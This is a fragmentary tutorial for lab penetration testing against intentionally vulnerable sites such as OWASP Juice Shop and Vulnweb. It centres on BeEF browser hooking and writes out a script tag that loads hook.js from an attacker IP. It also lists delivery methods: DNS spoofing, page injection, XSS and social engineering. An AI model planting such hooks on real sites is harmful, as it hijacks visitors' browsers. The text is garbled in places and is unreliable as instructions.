HTTP only.
This script works fully with: http://testasp.vulnweb.com/
eg, tag but may also break page load
http://www.pentest-standard.org/Works now against functioning: http://juice-shop.herokuapp.com/#/
But breaks the site stopping page load.
We are testing HTTP online against OWASP Juice Shop, and/or Vulnweb.
Both of these site have been designed and hosted as hackable sites.
Fully legal.
http://juice-shop.herokuapp.com/#/
http://testasp.vulnweb.com/
Against OWASP Juice Shop: http://127.0.0.1:42000/#/
There is misinformation about how to do this.
eg, install Docker, install node, install npm, download from github.
Here is the painfree Linux version:
- From anywhere on your terminal command line
sudo apt install juice-shop - When install is complete
- sudo juice-shop start
- Navigate to: http://127.0.0.1:42000/#/
- Take a moment to recognize that Linux ROX!
-
Set IP Table rules using set_iptables.py
You can figure how to do this, or just set the tables manually. -
Afterwards, flush the iptables, and check the tables have been flushed.
sudo iptables -L - No port forwarding required.
Browser Exploitation Framework allowing us to launch a number of attacks
on a hooked target.
Targets are hooked once they load a hook url.
- DNS spoof requests to a page containing the hook
- Inject the hook in browsed pages (need to be onPath)
- Use XSS Exploit
- Social engineer the target to open a hook page.
- sudo apt update
- sudp apt upgrade
- sudo apt-get install beef-xss
- In apps, navigate to Beef Start BeEF-xss, and click to start
- You will be prompted for a UN and a PW
- Navigate to http://127.0.0.1:3000/ui/panel
First Example, for Kali Linux only
- Go to /var/www/html/ to open index.html
- Make a backup of index.html, deleted all, insert the hook:
Get your ip ifconfig
<script src="http://:3000/hook.js"></script>
<script src="http://192.168.63.139:3000/hook.js"></script>
That's the only code you need for this example. - Start your websever: $ service apache2 start